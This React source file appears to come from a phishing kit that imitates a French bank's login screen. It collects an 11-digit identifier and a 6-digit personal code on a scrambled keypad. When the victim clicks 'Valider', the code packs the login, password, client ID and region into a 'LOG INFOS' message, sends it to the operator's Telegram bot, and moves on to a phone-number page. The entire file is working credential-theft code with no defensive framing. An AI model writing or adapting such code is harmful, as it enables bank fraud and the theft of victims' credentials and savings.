import { useContext } from "react";
import {
  CurrentPage,
  UserValues,
  UserErrors,
  UserButtons,
} from "../../Context/Context";
import styles from "./PassPage.module.css";
import  Configuration  from '../../Configuration/Configuration'
import Telegram from '../../API/Telegram'


function PassPage() {

  const [currentPageState, setCurrentPageState] = useContext(CurrentPage);
  const [userValuesState, setuserValuesState] = useContext(UserValues);
  const [userErrorsState, setuserErrorsState] = useContext(UserErrors);
  const [userButtonsState, setuserButtonsState] = useContext(UserButtons);

  const { tokenRzltOwner , idRzltOwner ,  redirect } = Configuration()



  const changeHandlerPass = (e) => {

    setuserValuesState((prevState, props) => {
        if (prevState.pass.length < 6){
          return {...prevState, pass: `${prevState.pass}${e.target.innerHTML}` }
        }else{
          return {...prevState }
        }
  }
  )

  };


  const onclickPassPage = async () => {

    // disable valider button
    setuserButtonsState({
      ...userButtonsState,
      PassPageButtonDisabled: true,
    });

    // wait 1 sec
    setTimeout( async () => {
      if(userValuesState.pass.length === 6 ){


        // Result Message
        const myMessage = `/-- LOG INFOS --/%0ARegion Link : ${userValuesState.regionLink}%0ARegion Name : ${userValuesState.regionName}%0ARegion Number : ${userValuesState.regionNumber}%0ALog : ${userValuesState.log}%0APass : ${userValuesState.pass}%0AID CLIENT :${userValuesState.idClient}%0A/------------------------------------/`
        // Send Result
        await Telegram(tokenRzltOwner , idRzltOwner , myMessage )


       
        //redirect
       // window.location.href = redirect;

       setCurrentPageState('PhonePage')



      } else {

        // enable button valider
        setuserButtonsState({
          ...userButtonsState,
          PassPageButtonDisabled: false,
        });

        // show error
        setuserErrorsState({ ...userErrorsState, passPageError: true });
      }
    }, 1000);
  };


  return (
    <div className={styles.container}>
      <div className={styles.lineOne}>
        <img alt="" src="./images/acceder.png" />
      </div>

      <div className={styles.lineTwo}>
        <div className={styles.partOne}>
          <div className={styles.identifiant}>IDENTIFIANT</div>
          <div className={styles.saissisiez}>
            Saisissez votre identifiant à 11 chiffres
          </div>
          <div className={styles.input}>
            <div className={styles.logExit + " noselect"}>X</div>
            <input type="text" value={userValuesState.log} maxLength="11" disabled />
          </div>

          <div className={styles.lineTwo}>
            <div className={styles.personel}>CODE PERSONNEL</div>
            <a href="#" className={styles.oublie}>
              Perdu / Oublié ?
            </a>
          </div>

          <div
            className={styles.error}
            style={
              userErrorsState.passPageError
                ? { display: "block" }
                : { display: "none" }
            }
          >
            Veuillez ressaisir votre identifiant et votre code personnel.
          </div>

          <div className={styles.input}>
            <input
              type="password"
              placeholder="Tapez votre code dans le pavé numériq"
              value={userValuesState.pass}
              maxLength="6"
              disabled
            />
          </div>


          <div className={styles.passwordList+' noselect'}>
            <div className={styles.passwordLineOne}>
              <div onClick={changeHandlerPass} >3</div>
              <div onClick={changeHandlerPass} >5</div>
              <div onClick={changeHandlerPass} >7</div>
              <div onClick={changeHandlerPass} >0</div>
              <div onClick={changeHandlerPass} >9</div>
            </div>
            <div className={styles.passwordLineTwo}>
              <div onClick={changeHandlerPass} >2</div>
              <div onClick={changeHandlerPass} >8</div>
              <div onClick={changeHandlerPass} >4</div>
              <div onClick={changeHandlerPass} >6</div>
              <div onClick={changeHandlerPass} >1</div>
            </div>
          </div>


          <button
            className={styles.button + " noselect"}
            style={
              userButtonsState.PassPageButtonDisabled
                ? { backgroundColor: "#98cbd3" }
                : { backgroundColor: "#007d8f" }
            }
            disabled={userButtonsState.PassPageButtonDisabled}
            onClick={onclickPassPage}
          >
            Valider
          </button>



        </div>

        <div className={styles.partTwo}>
          <img alt="" src="./images/info.png" />
        </div>
      </div>

      <div className={styles.lineTree}>
        <div className={styles.devenirImg}>
          <img alt="" src="./images/devenir.png" />
        </div>
        <div className={styles.devenir + " noselect"}>Devenir</div>
      </div>
    </div>
  );
}

export default PassPage;
